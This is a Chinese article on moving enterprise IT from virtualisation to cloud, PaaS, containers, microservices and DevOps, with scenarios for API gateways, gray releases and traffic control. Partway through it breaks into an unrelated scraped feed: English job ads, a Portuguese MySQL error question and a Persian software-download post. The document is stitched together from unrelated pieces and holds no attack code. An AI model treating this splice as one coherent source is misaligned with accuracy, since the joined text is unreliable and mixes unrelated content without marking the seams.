随着服务的拆分,不同的业务开发组会接到不同的需求,并行开发功能增多,发布频繁,会造成测试环境,生产环境更加频繁的部署。

而频繁的部署,就需要频繁创建和删除虚拟机。

如果还是采用上面审批的模式,运维部就会成为瓶颈,要不就是影响开发进度,要不就是被各种部署累死。

这就需要进行运维模式的改变,也即基础设施层云化。

虚拟化到云化有什么不一样呢?

首先要有良好的租户管理,从运维集中管理到租户自助使用模式的转换。

image

也即人工创建,人工调度,人工配置的集中管理模式已经成为瓶颈,应该变为租户自助的管理,机器自动的调度,自动的配置。

其次,要实现基于Quota和QoS的资源控制。

也即对于租户创建的资源的控制,不用精细化到运维手动管理一切,只要给这个客户分配了租户,分配了Quota,设置了Qos,租户就可以在运维限定的范围内,自由随意的创建,使用,删除虚拟机,无需通知运维,这样迭代速度就会加快。

再次,要实现基于虚拟网络,VPC,SDN的网络规划。

image

image

原来的网络使用的都是物理网络,问题在于物理网络是所有部门共享的,没办法交给一个业务部门自由的配置和使用。因而要有VPC虚拟网络的概念,每个租户可以随意配置自己的子网,路由表,和外网的连接等,不同的租户的网段可以冲突,互不影响,租户可以根据自己的需要,随意的在界面上,用软件的方式做网络规划。

除了基础设施云化之外,运维部门还应该将应用的部署自动化。

image

因为如果云计算不管应用,一旦出现扩容,或者自动部署的需求,云平台创建出来的虚拟机还是空的,需要运维手动上去部署,根本忙不过来。因而云平台,也一定要管理应用。

云计算如何管理应用呢?我们将应用分成两种,一种称为通用的应用,一般指一些复杂性比较高,但大家都在用的,例如数据库。几乎所有的应用都会用数据库,但数据库软件是标准的,虽然安装和维护比较复杂,但无论谁安装都是一样。这样的应用可以变成标准的PaaS层的应用放在云平台的界面上。当用户需要一个数据库时,一点就出来了,用户就可以直接用了。

image

所以对于运维模式的第二个改变是,通用软件PaaS化。

前面说过了,在开发部门有中间件组负责这些通用的应用,运维也自动部署这些应用,两个组的界限是什么样的呢?

一般的实践方式是,云平台的PaaS负责创建的中间件的稳定,保证SLA,当出现问题的时候,会自动修复。

而开发部门的中间件组,主要研究如何正确的使用这些PaaS,配置什么样的参数,使用的正确姿势等等,这个和业务相关。

image

除了通用的应用,还有个性化的应用,应该通过脚本进行部署,例如工具Puppet, Chef, Ansible, SaltStack等。

这里有一个实践是,不建议使用裸机部署,因为这样部署非常的慢,推荐基于虚拟机镜像的自动部署。在云平台上,任何虚拟机的创建都是基于镜像的,我们可以在镜像里面,将要部署的环境大部分部署好,只需要做少量的定制化,这些由部署工具完成。

image

下图是OpenStack基于Heat的虚拟机编排,除了调用OpenStack API基于镜像创建虚拟机之外,还要调用SaltStack的master,将定制化的指令下发给虚拟机里面的agent。

image

基于虚拟机镜像和脚本下发,可以构建自动化部署平台NDP

image

这样可以基于虚拟机镜像,做完整的应用的部署和上线,称为编排。基于编排,就可以进行很好的持续集成,例如每天晚上,自动部署一套环境,进行回归测试,从而保证修改的正确性。

image

进行完第二阶段之后,整个状态如上图所示。

这里运维部门的职能有了一定的改变,除了最基本的资源创建,还要提供自助的操作平台,PaaS化的中间件,基于镜像和脚本的自动部署。

开发部门的职能也有了一定的改变,拆分称为前端组,业务开发组,中台组,中间件组,其中中间件组合运维部门的联系最紧密。

3.4. 阶段二有什么问题吗?

其实大部分的企业,到了这个阶段,已经可以解决大部分的问题了。

能够做到架构SOA化,基础设施云化的公司已经是传统行业在信息化领域的佼佼者了。

中台开发组基本能够解决中台的能力复用问题,持续集成也基本跑起来了,使得业务开发组的迭代速度明显加快。

集中的中间件组或者架构组,可以集中选型,维护,研究消息队列,缓存等中间件。

在这个阶段,由于业务的稳定性要求,很多公司还是会采用Oracle商用数据库,也没有什么问题。

实现到了阶段二,在同行业内,已经有一定的竞争优势了。

3.5. 什么情况下才会觉得阶段二有问题?

我们发现,当传统行业不再满足于在本行业的领先地位,希望能够对接到互联网业务的时候,上面的模式才出现新的痛点。

对接互联网所面临的最大的问题,就是巨大的用户量所带来的请求量和数据量,会是原来的N倍,能不能撑得住,大家都心里没底。

例如有的客户推出互联网理财秒杀抢购,原来的架构无法承载近百倍的瞬间流量。

有的客户对接了互联网支付,甚至对接了国内最大的外卖平台,而原来的ESB总线,就算扩容到最大规模(13个节点),也可能撑不住。

有的客户虽然已经用了Dubbo实现了服务化,但是没有熔断,限流,降级的服务治理策略,有可能一个请求慢,高峰期波及一大片,或者请求全部接进来,最后都撑不住而挂一片。

有的客户希望实现工业互连网平台,可是接入的数据量动辄PB级别,如果扛的住是一个很大的问题。

有的客户起初使用开源的缓存和消息队列,分布式数据库,但是读写频率到了一定的程度,就会出现各种奇奇怪怪的问题,不知道应该如何调优。

有的客户发现,一旦到了互联网大促级别,Oracle数据库是肯定扛不住的,需要从Oracle迁移到DDB分布式数据库,可是怎么个迁移法,如何平滑过渡,心里没底。

有的客户服务拆分之后,原来原子化的操作分成了两个服务调用,如何仍然保持原子化,要不全部成功,要不全部失败,需要分布式事务,虽然业内有大量的分布式方案,但是能够承载高并发支付的框架还没有。

当出现这些问题的时候,才应该考虑进入第三个阶段,微服务化

四、阶段三:组织DevOps化,架构微服务化,基础设施容器化

image

4.1. 阶段三的应用架构

从SOA到微服务化这一步非常关键,复杂度也比较高,上手需要谨慎。

为了能够承载互联网高并发,业务往往需要拆分的粒度非常的细,细到什么程度呢?我们来看下面的图。

image

在这些知名的使用微服务的互联网公司中,微服务之间的相互调用已经密密麻麻相互关联成为一个网状,几乎都看不出条理来。

为什么要拆分到这个粒度呢?主要是高并发的需求。

但是高并发不是没有成本的,拆分成这个粒度会有什么问题呢?你会发现等拆完了,下面的这些措施一个都不能少。

  • 服务之间要设定熔断,限流,降级策略,一旦调用阻塞应该快速失败,而不应该卡在那里,处于亚健康状态的服务要被及时熔断,不产生连锁反应。非核心业务要进行降级,不再调用,将资源留给核心业务。要在压测到的容量范围内对调用限流,宁可慢慢处理,也不用一下子都放进来,把整个系统冲垮。

image

应用层需要处理这十二个问题,最后一个都不能少,实施微服务,你做好准备了吗?你真觉得攒一攒springcloud,就能够做好这些吗?

4.2. 阶段三的运维模式

业务的微服务化改造之后,对于运维的模式是有冲击的。

image

如果业务拆成了如此网状的细粒度,服务的数目就会非常的多,每个服务都会独立发布,独立上线,因而版本也非常多。

这样环境就会非常的多,手工部署已经不可能,必须实施自动部署。好在在上一个阶段,我们已经实施了自动部署,或者基于脚本的,或者基于镜像的,但是到了微服务阶段都有问题。

如果基于脚本的部署,脚本原来多由运维写,由于服务太多,变化也多,脚本肯定要不断的更新,而每家公司的开发人员都远远多于运维人员,运维根本来不及维护自动部署的脚本。那脚本能不能由开发写呢?一般是不可行的,开发对于运行环境了解有限,而且脚本没有一个标准,运维无法把控开发写的脚本的质量。

基于虚拟机镜像的就会好很多,因为需要脚本做的事情比较少,大部分对于应用的配置都打在镜像里面了。如果基于虚拟机镜像进行交付,也能起到标准交付的效果。而且一旦上线有问题,也可以基于虚拟机镜像的版本进行回滚。

但是虚拟机镜像实在是太大了,动不动几百个G,如果一共一百个服务,每个服务每天一个版本,一天就是10000G,这个存储容量,谁也受不了。

这个时候,容器就有作用了。镜像是容器的根本性发明,是封装和运行的标准,其他什么namespace,cgroup,早就有了。

原来开发交付给运维的,是一个war包,一系列配置文件,一个部署文档,但是由于部署文档更新不及时,常常出现运维部署出来出错的情况。有了容器镜像,开发交付给运维的,是一个容器镜像,容器内部的运行环境,应该体现在Dockerfile文件中,这个文件是应该开发写的。

这个时候,从流程角度,将环境配置这件事情,往前推了,推到了开发这里,要求开发完毕之后,就需要考虑环境部署的问题,而不能当甩手掌柜。由于容器镜像是标准的,就不存在脚本无法标准化的问题,一旦单个容器运行不起来,肯定是Dockerfile的问题。

而运维组只要维护容器平台就可以,单个容器内的环境,交给开发来维护。这样做的好处就是,虽然进程多,配置变化多,更新频繁,但是对于某个模块的开发团队来讲,这个量是很小的,因为5-10个人专门维护这个模块的配置和更新,不容易出错。自己改的东西自己知道。

如果这些工作量全交给少数的运维团队,不但信息传递会使得环境配置不一致,部署量会大非常多。

容器作用之一就是环境交付提前,让每个开发仅仅多做5%的工作,就能够节约运维200%的工作,并且不容易出错。

image

容器的另外一个作用,就是不可改变基础设施。

容器镜像有个特点,就是ssh到里面做的任何修改,重启都不见了,恢复到镜像原来的样子,也就杜绝了原来我们部署环境,这改改,那修修最后部署成功的坏毛病。

因为如果机器数目比较少,还可以登录到每台机器上改改东西,一旦出了错误,比较好排查,但是微服务状态下,环境如此复杂,规模如此大,一旦有个节点,因为人为修改配置导致错误,非常难排查,所以应该贯彻不可改变基础设施,一旦部署了,就不要手动调整了,想调整从头走发布流程。

这里面还有一个概念叫做一切即代码,单个容器的运行环境Dockerfile是代码,容器之间的关系编排文件是代码,配置文件是代码,所有的都是代码,代码的好处就是谁改了什么,Git里面一清二楚,都可以track,有的配置错了,可以统一发现谁改的。

4.3. 阶段三的组织形态

到了微服务阶段,实施容器化之后,你会发现,然而本来原来运维该做的事情开发做了,开发的老大愿意么?开发的老大会投诉运维的老大么?

这就不是技术问题了,其实这就是DevOps,DevOps不是不区分开发和运维,而是公司从组织到流程,能够打通,看如何合作,边界如何划分,对系统的稳定性更有好处。

image

其实开发和运维变成了一个融合的过程,开发会帮运维做一些事情,例如环境交付的提前,Dockerfile的书写。

运维也可以帮助研发做一些事情,例如微服务之间的注册发现,治理,配置等,不可能公司的每一个业务都单独的一套框架,可以下沉到运维组来变成统一的基础设施,提供统一的管理。

实施容器,微服务,DevOps后,整个分工界面就变成了下面的样子。

image

在网易就是这个模式,杭州研究院作为公共技术服务部门,有运维部门管理机房,上面是云平台组,基于OpenStack开发了租户可自助操作的云平台。PaaS组件也是云平台的一部分,点击可得,提供SLA保障。容器平台也是云平台的一部分,并且基于容器提供持续集成,持续部署的工具链。

微服务的管理和治理也是云平台的一部分,业务部门可以使用这个平台进行微服务的开发。

业务部门的中间件组或者架构组合云平台组沟通密切,主要是如何以正确的姿势使用云平台组件。

业务部门分前端组,业务开发组,中台开发组。

五、如何实施微服务,容器化,DevOps

实施微服务,容器化,DevOps有很多的技术选型。

其中容器化的部分,Kubernetes当之无愧的选择。但是Kubernetes可不仅仅志在容器,他是为微服务而设计的。对于实施微服务各方面都有涉及。

详细分析参加为什么 kubernetes 天然适合微服务

image

但是Kubernetes对于容器的运行时生命周期管理比较完善,但是对于服务治理方面还不够强大。

因而对于微服务的治理方面,多选择使用Dubbo或者SpringCloud。使用Dubbo的存量应用比较多,相对于Dubbo来讲,SpringCloud比较新,组件也比较丰富。但是SpringCloud的组件都不到开箱即用的程度,需要比较高的学习曲线。

image

因而基于Kubernetes和SpringCloud,就有了下面这个微服务,容器,DevOps的综合管理平台。包含基于Kubernetes的容器平台,持续集成平台,测试平台,API网关,微服务框架,APM应用性能管理。

image

主要为了解决从阶段一到阶段二,或者阶段二到阶段三的改进中的痛点。

下面我们列举几个场景。

场景一:架构SOA拆分时,如何保证回归测试功能集不变

前面说过,服务拆分后,最怕的是拆完了引入一大堆的bug,通过理智肯定不能保证拆分后功能集是不变的,因而需要有回归测试集合保证,只要测试集合通过了,功能就没有太大的问题。

回归测试最好是基于接口的,因为基于UI的很危险,有的接口是有的,但是UI上不能点,这个接口如果有Bug,就被暂时隐藏掉了,当后面有了新的需求,当开发发现有个接口能够调用的时候,一调用就挂了。

image

有了基于Restful API的接口测试之后,可以组成场景测试,将多个API调用组合成为一个场景,例如下单,扣优惠券,减库存,就是一个组合场景。

另外可以形成测试集合,例如冒烟测试集合,当开发将功能交付给测试的时候,执行一下。再如日常测试集合,每天晚上跑一遍,看看当天提交的代码有没有引入新的bug。再如回归测试集合,上线之前跑一遍,保证大部分的功能是正确的。

场景二:架构SOA化的时候,如何统一管理并提供中台服务

当业务要提供中台服务的时候,中台服务首先希望能够注册到一个地方,当业务组开发业务逻辑的时候,能够在这个地方找到中台的接口如何调用的文档,当业务组的业务注册上来的时候,可以进行调用。

image

在微服务框架普通的注册发现功能之外,还提供知识库的功能,使得接口和文档统一维护,文档和运行时一致,从而调用方看着文档就可以进行调用。

另外提供注册,发现,调用期间的鉴权功能,不是谁看到中台服务都能调用,需要中台管理员授权才可以。

为了防止中台服务被恶意调用,提供账户审计功能,记录操作。

场景三:服务SOA化的时候,如何保证关键服务的调用安全

image

有的服务非常关键,例如支付服务,和资金相关,不是谁想调用就能调用的,一旦被非法调用了,后果严重。

在服务治理里面有路由功能,除了能够配置灵活的路由功能之外,还可以配置黑白名单,可以基于IP地址,也可以基于服务名称,配置只有哪些应用可以调用,可以配合云平台的VPC功能,限制调用方。

场景四:架构SOA化后,对外提供API服务,构建开放平台

image

架构SOA化之后,除了对内提供中台服务,很多能力也可以开放给外部的合作伙伴,形成开放平台。例如你是一家物流企业,除了在你的页面上下单寄快递之外,其他的电商也可以调用你的API来寄快递,这就需要有一个API网关来管理API,对接你的电商只要登录到这个API网关,就能看到API以及如何调用,API网关上面的文档管理就是这个作用。

另外API网关提供接口的统一认证鉴权,也提供API接口的定时开关功能,灵活控制API的生命周期。

场景五:互联网场景下的灰度发布和A/B测试

接下来我们切换到互联网业务场景,经常会做A/B测试,这就需要API网关的流量分发功能。

例如我们做互联网业务,当上一个新功能的 时候,不清楚客户是否喜欢,于是可以先开放给山东的客户,当HTTP头里面有来自山东的字段,则访问B系统,其他客户还是访问A系统,这个时候可以看山东的客户是否都喜欢,如果都喜欢,就推向全国,如果不喜欢,就撤下来。

场景六:互联网场景下的预发测试

这个也是互联网场景下经常遇到的预发测试,虽然我们在测试环境里面测试了很多轮,但是由于线上场景更加复杂,有时候需要使用线上真实数据进行测试,这个时候可以在线上的正式环境旁边部署一套预发环境,使用API网关将真实的请求流量,镜像一部分到预发环境,如果预发环境能够正确处理真实流量,再上线就放心多了。

场景七:互联网场景下的性能压测

互联网场景下要做线上真实的性能压测,才能知道整个系统真正的瓶颈点。但是性能压测的数据不能进真实的数据库,因而需要进入影子库,性能压测的流量,也需要有特殊的标记放在HTTP头里面,让经过的业务系统知道这是压测数据,不进入真实的数据库。

这个特殊的标记要在API网关上添加,但是由于不同的压测系统要求不一样,因而需要API网关有定制路由插件功能,可以随意添加自己的字段到HTTP头里面,和压测系统配合。

场景八:微服务场景下的熔断,限流,降级

微服务场景下,大促的时候,需要进行熔断,限流,降级。这个在API网关上可以做,将超过压测值的流量,通过限流,拦在系统外面,从而保证尽量的流量,能够下单成功。

在服务之间,也可以通过微服务框架,进行熔断,限流,降级。Dubbo对于服务的控制在接口层面,SpringCloud对于服务的管理在实例层面,这两个粒度不同的客户选择不一样,都用Dubbo粒度太细,都用SpringCloud粒度太粗,所以需要可以灵活配置。

image

场景九:微服务场景下的精细化流量管理。

image

在互联网场景下,经常需要对于流量进行精细化的管理,可以根据HTTP Header里面的参数进行分流,例如VIP用户访问一个服务,非VIP用户访问另一个服务,这样可以对高收入的用户推荐更加精品的产品,增加连带率。


          Kshops      Cache   Translate Page      
Por favor peço ajuda para este erro na hora de instalar.     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(14) NOT NULL, p_added timestamp(14) NOT NULL, PRIMARY KEY (p_id), KEY p_' at line 17
          Looking for experienced PHP developer for Flynax script      Cache   Translate Page      
Please only reply if you have experience with Flynax PHP scripts. I am looking for a experienced PHP developer for long term. Loyal and respectful person over here. (Budget: €12 - €18 EUR, Jobs: HTML, MySQL, PHP, Software Architecture, Website Design)
          Filemaker developer needed for a teamwork data maintenance      Cache   Translate Page      
We need a customized mobile app to realize a teamwork machine data maintenance. Task Background We are selling products to optimize paper production. Our customers are all from different paper mills... (Budget: $25 - $50 USD, Jobs: Database Programming, FileMaker, MySQL, PHP, Software Architecture)
          Update online reservation system      Cache   Translate Page      
need to update online reservation system, (Budget: $10 - $30 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Filemaker developer needed for a teamwork data maintenance      Cache   Translate Page      
We need a customized mobile app to realize a teamwork machine data maintenance. Task Background We are selling products to optimize paper production. Our customers are all from different paper mills... (Budget: $25 - $50 USD, Jobs: Database Programming, FileMaker, MySQL, PHP, Software Architecture)
          Update online reservation system      Cache   Translate Page      
need to update online reservation system, (Budget: $10 - $30 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Engineer I - Software - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, SQL Server, Oracle, PostgreSQL. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to redefine the communications...
From DISH - Sat, 27 Oct 2018 12:43:20 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Experts Engaged in Delivering Their Best - This is the cornerstone of our service-oriented...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Sun, 29 Jul 2018 06:18:46 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, MS SQL, Oracle, or other professional database system. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to...
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          دانلود Navicat Premium 12.1.9 – مدیریت بانک اطلاعاتی      Cache   Translate Page      

دانلود Navicat Premium 11.2.14 -مدیریت بانک اطلاعاتی

Navicat Premium یک نرم افزار برای مدیریت و کار با بانک های اطلاعاتی MySQL, PostgreSQL,Oracle میباشد این نرم افزار به شما اجازه می دهد به سازماندهی و تبادل داده ها در بانک های اطلاعاتی خود پرداخته و از ایمن بودن انجام فرایند آن  ها آسوده خاطر باشید.با استفاده از Navicat Premium میتوان به سرور های محلی و یا ریموت اتصال برقرار کرده و کارهایی مثل ورودی , خروجی داده هارا به خوبی انجام دهید.

The post دانلود Navicat Premium 12.1.9 – مدیریت بانک اطلاعاتی appeared first on بیت دانلود.


          Stage: Stage PHP Developer / Programmeur in Bodegraven      Cache   Translate Page      
<p><em>Wij zoeken doorlopend PHP stagiaires met skills! Reageer snel voor een uitdagende stage bij een jong ambitieus bedrijf! De periode is nader te bepalen.</em></p> <p><strong>Omschrijving stage / afstudeerproject<br /></strong></p> <p class="p3">Ben jij een student met affiniteit voor webdevelopment? En ben jij die hobbyist die graag bezig is met programmeren? Dan zijn wij op zoek naar jou!</p> <p class="p3">Stage lopen bij ons betekent meedraaien in een hecht team van slimme collega’s waar je de ruimte krijgt om je stempel te drukken en door te groeien. We dagen je uit om je skills te verbeteren en helpen je daar graag bij. Je werkt voor verschillende klanten aan mooie projecten!</p> <p class="p3">We verwachten van jou een goed probleemoplossend vermogen en kennis van PHP, MySQL, HTML en enkele CMS systemen en frameworks. Je moet openstaan voor het leren en gebruiken van nieuwe technologieën en API’s en daar een uitdaging in zien. Kun jij je hierin vinden én sluiten de functie-eisen en ons aanbod bij je aan, dan dagen we jou graag uit om te reageren!!</p> <p><strong>Wij bieden</strong></p> <ul> <li>Een marktconforme stagevergoeding</li> <li>Een afwisselende stage</li> <li>Goede begeleiding</li> <li>Leuke collega’s en goede werksfeer</li> <li>Een eigen werkplek met snelle Mac</li> </ul> <p><strong>Over ons<br /></strong>Wij zijn een jong en energiek communicatiebureau. We ondersteunen het MKB met ons fullservice marketing- en communicatieadvies, grafisch ontwerp en web development. Met veel enthousiasme koppelen wij creativiteit aan daadkracht. Wij onderscheiden ons met een nuchtere en verrassend complete aanpak. Nieuwsgierig naar ons werk?</p> ...
          Werkstudent (m/w) Web Entwicklung innovativer Markenprojekte      Cache   Translate Page      
Jobangebot: Mehr Infos und bewerben unter: https://www.campusjaeger.de/jobs/6968?s=18111178+ Was erwartet Dich?Wir sind eine Agentur für digitale Erlebnisse und realisiert innovative Lösungen für renommierte Markenkunden für Web, soziale Netzwerke und mobile Endgeräte. Wir stehen fast jeden Tag vor anderen, immer neuen und spannenden Aufgaben. Routine und Langeweile sind für uns Fremdwörter. * Unterstütze uns als Werkstudent (m/w) bei der Entwicklung anspruchsvoller und responsiver Webprojekte (Websites, MicroSites Online-Shops, Games, digitale Erlebniswelten)+ Was Du mitbringen solltest? * PHP 5, MYSQL. HTML * objektorientierte Programmierung * Erfahrung mit Zend, Flow3, Laravel oder einem anderen MVC-Framework ... 0 Kommentare, 40 mal gelesen.
          (USA-MA-Boston) Java Developer - Dropwizard, Cloud Computing, Java      Cache   Translate Page      
Java Developer - Dropwizard, Cloud Computing, Java Java Developer - Dropwizard, Cloud Computing, Java - Skills Required - Dropwizard, Cloud Computing, Java, MySQL, AWS, Linux If you are a Java Developer with experience, please read on! **What You Need for this Position** At Least 3 Years of experience and knowledge of: - Dropwizard - Cloud Computing - Java - MySQL - AWS - Linux **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Java Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Java Developer - Dropwizard, Cloud Computing, Java* *MA-Boston* *TB7-1492874*
          (USA-OH-Cincinnati) Senior Software Engineer - Java      Cache   Translate Page      
Senior Software Engineer - Java Senior Software Engineer - Java - Skills Required - Java, JSP, Spring, MVC, Hibernate, MySQL, REST API We are an online auction marketplace with over 10 years of experience in connecting buyers and sellers nationwide. Join a rapidly growing team of young and seasoned professionals in creating the ultimate bidding experience and the best deals anywhere. **What You Will Be Doing** We are looking to hire a mid level software engineer with 3-5 years of Java development experience. We are looking for someone who works well with a team and who is passionate about building and maintaining great software that improves both our customer and employee experiences. We're a fast paced but casual work environment that's moving into a new growth stage and need people who are excited and passionate about the work they do and the team they are part of. Responsibilities include: - Ownership of existing code base - Maintaining, fixing and improving existing software with clean, efficient code - Testing and deploying programs and systems - Teaching and mentoring junior members of the team - Continuing to learn and improve your own skill set **What You Need for this Position** - 3-5 years of experience as a Software Developer, Software Engineer or similar role - Able and willing to work with others on a team - Experience with software design and development in a test-driven environment - Knowledge of coding languages: Java, JSP, Spring MVC, HIbernate/JDBC template MySQL, REST API - Ability to learn new languages and technologies - Resourcefulness and troubleshooting aptitude - Attention to detail - BSc/BA in Computer Science, Engineering or a related field **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Senior Software Engineer - Java with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Software Engineer - Java* *OH-Cincinnati* *RV5-1493020*
          (USA-CA-Irvine) System Administrator - Linux/AWS      Cache   Translate Page      
System Administrator - Linux/AWS System Administrator - Linux/AWS - Skills Required - AWS, TDD, CI/CD, Linux If you are a DevOps Engineer with experience, please read on! Located in South Irvine, we are a privately held start-up revolutionizing the world of package delivery. We offer an exciting, fast-paced work environment with evolving technology and are looking for a sharp Linux System Administrator to come in and make an immediate impact! **What's In It for You** We offer an exciting compensation package including but not limited to: - A competitive base salary (DOE) - Full benefits (Medical, Dental, Vision) - Generous PTO/Sick time - Great company culture - Surprise lunches, group activities, holiday celebrations! - Collaborative environment with passionate team members **What You Need for this Position** We are open to all levels of candidates that meet the minimum requirements of: - At least 1-2 years of professional DevOps/Ops/Systems Administration experience (the more the merrier!) - AWS experience (EC2-VPC and EC2 Classic, RDS, S3, VPC, SQS, ELB, IAM,ElasticSearch) - Linux (RedHat or CENTOS 7) - No windows servers! Preferred, knowledge of: - RDS / MySQL DCM - AWS Load Balancing - PCI and other security related standards and requirements -Solid understanding of software development life cycle, test driven development, continuous integration and continuous delivery - Proficient in modern web development patterns and practices - Solid understanding of core AWS services and their management in production environments - Docker Implementation and Deployment - Alert Logic Notification Setup - Administration skills in at least some of the following: JIRA, Confluence, BitBucket So, if you are a System Administrator with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *System Administrator - Linux/AWS* *CA-Irvine* *RK6-1492854*
          (USA-NY-New York City) Senior Ruby Developer - Growing FinTech company!      Cache   Translate Page      
Senior Ruby Developer - Growing FinTech company! Senior Ruby Developer - Growing FinTech company! - Skills Required - RUBY, Ruby On Rails, PostgreSQL, MySQL If you are a Senior Ruby Developer with experience, please read on! We are a growing financial technology company in NYC, looking to build our development team with a senior level individual. Lots of opportunity! We are looking for a Senior Ruby Developer with 4+ years of Ruby development who can also be a mentor to the team. This is a Developer role, but in a player/coach capacity. You must come from a high traffic environment, data heavy so you can build highly scalable applications. You must have experience with MVC and the ability to design as well as build web interfaces with Ruby on Rails and multiple databases. If you want to be part of something big, we want to hear from you! You do not need a financial services background but that is a plus too! **What You Need for this Position** Requirements: 4+ years of Ruby on Rails development experience, full stack development Experience with SQL Server or MySQL Experience with MVC Strong background in design patterns Experience with a high traffic, data intense web application **What's In It for You** We offer a strong compensation package and a great environment! Local Candidates ONLY please So, if you are a Senior Ruby Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Ruby Developer - Growing FinTech company!* *NY-New York City* *RK3-1492818*
          (USA-OH-Cincinnati) Senior Ruby Developer - Growing FinTech company!      Cache   Translate Page      
Senior Ruby Developer - Growing FinTech company! Senior Ruby Developer - Growing FinTech company! - Skills Required - RUBY, Ruby On Rails, PostgreSQL, MySQL If you are a Senior Ruby Developer with experience, please read on! We are a growing financial technology company looking to build our development team with a senior level individual. Lots of opportunity! We are looking for a Senior Ruby Developer with 4+ years of Ruby development who can also be a mentor to the team. This is a Developer role, but in a player/coach capacity. You must come from a high traffic environment, data heavy so you can build highly scalable applications. You must have experience with MVC and the ability to design as well as build web interfaces with Ruby on Rails and multiple databases. If you want to be part of something big, we want to hear from you! You do not need a financial services background but that is a plus too! **What You Need for this Position** Requirements: 4+ years of Ruby on Rails development experience, full stack development Experience with SQL Server or MySQL Experience with MVC Strong background in design patterns Experience with a high traffic, data intense web application **What's In It for You** We offer a strong compensation package and a great environment! Local Candidates ONLY please So, if you are a Senior Ruby Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Ruby Developer - Growing FinTech company!* *OH-Cincinnati* *RK3-1492832*
          (USA-MI-Traverse City) Software Engineer - VB.Net, C#, Test Driven Development      Cache   Translate Page      
Software Engineer - VB.Net, C#, Test Driven Development Software Engineer - VB.Net, C#, Test Driven Development - Skills Required - VB.Net, C#, Test Driven Development, Azure, SQL Server, MySQL, SqlLite, Agile, SCRUM, Devops If you are a Software Engineer with experience, please read on! Located in Traverse City, MI, we are a successful healthcare company that has operated for decades with multiple locations nationwide! Our goal as an organization is to provide the best experience possible in health care services. **What You Will Be Doing** The Software Engineer will be responsible for supporting and enhancing software applications, troubleshoot issues, and oversee the code review process. Will oversee the software documentation phase along with serving as a point person for technical issues. **What You Need for this Position** At Least 3 Years of experience and knowledge of: - VB.Net - C# - Test Driven Development - Azure - SQL Server - MySQL - SqlLite - Agile - SCRUM - DevOps **What's In It for You** - Competitive Base Salary (DOE) - Full Health Benefits - 401(k) - Career Growth and Development - Company Perks - Paid Time off (PTO) So, if you are a Software Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer - VB.Net, C#, Test Driven Development* *MI-Traverse City* *PP4-1492998*
          (USA-MN-Cottage Grove) Senior Software Engineer - PHP, JavaScript, LAMP      Cache   Translate Page      
Senior Software Engineer (PHP) - PHP, JavaScript, LAMP Senior Software Engineer (PHP) - PHP, JavaScript, LAMP - Skills Required - PHP, JavaScript, LAMP, Linux, Apache, MySQL, JQuery, HTML, CSS, API If you are a Senior Software Engineer with PHP and JavaScript experience, please read on! We are located just south of the beautiful Saint Paul, MN area and we are a cutting edge software company in the hospitality space. We were just named one of the fastest growing tech companies in the area and are rapidly expanding. We have a very fast paced and collaborative environment that really enjoys the culture we have created. We need a skilled full stack software engineer who is well-versed with PHP and also has experience working with JavaScript. This person will help create cutting edge web applications and improve the efficiency and scalability of our business applications. This developer will also help design/develop front-end interfaces, underlying APIS, and backend systems. **Top Reasons to Work with Us** -Work with cutting edge technology 